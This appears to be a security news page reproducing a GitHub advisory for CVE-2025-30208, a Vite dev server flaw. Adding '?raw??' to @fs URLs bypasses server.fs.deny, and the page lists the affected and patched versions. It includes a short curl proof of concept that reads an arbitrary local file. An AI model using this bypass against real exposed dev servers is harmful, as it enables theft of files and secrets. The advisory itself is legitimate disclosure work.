Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-x574-m823-4x7w: Vite bypasses server.fs.deny when using ?raw??

Summary

The contents of arbitrary files can be returned to the browser.

Impact

Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?raw?? or ?import&raw?? to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as ? are removed in several places, but are not accounted for in query string regexes.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...
ghsa
Open in Source
#vulnerability#web#nodejs#js#git

Skip to content

Navigation Menu

    • GitHub Copilot

      Write better code with AI

    • Security

      Find and fix vulnerabilities

    • Actions

      Automate any workflow

    • Codespaces

      Instant dev environments

    • Issues

      Plan and track work

    • Code Review

      Manage code changes

    • Discussions

      Collaborate outside of code

    • Code Search

      Find more, search less

  • Explore

    • Learning Pathways
    • Events & Webinars
    • Ebooks & Whitepapers
    • Customer Stories
    • Partners
    • Executive Insights

    • GitHub Sponsors

      Fund open source developers

*   The ReadME Project
    
    GitHub community articles

    • Enterprise platform

      AI-powered developer platform

  • Pricing

Provide feedback

Saved searches****Use saved searches to filter your results more quickly

Sign up

  1. GitHub Advisory Database
  2. GitHub Reviewed
  3. CVE-2025-30208

Vite bypasses server.fs.deny when using ?raw??

Moderate severity GitHub Reviewed Published Mar 24, 2025 in vitejs/vite • Updated Mar 25, 2025

Affected versions

>= 6.2.0, < 6.2.3

>= 6.1.0, < 6.1.2

>= 6.0.0, < 6.0.12

>= 5.0.0, < 5.4.15

< 4.5.10

Patched versions

6.2.3

6.1.2

6.0.12

5.4.15

4.5.10

Description

Summary

The contents of arbitrary files can be returned to the browser.

Impact

Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?raw?? or ?import&raw?? to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as ? are removed in several places, but are not accounted for in query string regexes.

PoC

$ npm create vite@latest $ cd vite-project/ $ npm install $ npm run dev

$ echo “top secret content” > /tmp/secret.txt

expected behaviour

$ curl “http://localhost:5173/@fs/tmp/secret.txt”

<body\>
  <h1>403 Restricted</h1>
  <p\>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

security bypassed

$ curl “http://localhost:5173/@fs/tmp/secret.txt?import&raw??” export default “top secret content\n” //# sourceMappingURL=data:application/json;base64,eyJ2…

References

  • GHSA-x574-m823-4x7w
  • https://nvd.nist.gov/vuln/detail/CVE-2025-30208
  • vitejs/vite@315695e
  • vitejs/vite@80381c3
  • vitejs/vite@807d7f0
  • vitejs/vite@92ca12d
  • vitejs/vite@f234b57

Published to the GitHub Advisory Database

Mar 25, 2025

Last updated

Mar 25, 2025

EPSS score

ghsa: Latest News

GHSA-3hw7-qj9h-r835: Gardener allows bypassing project secret validation which can lead to privilege escalation
ghsa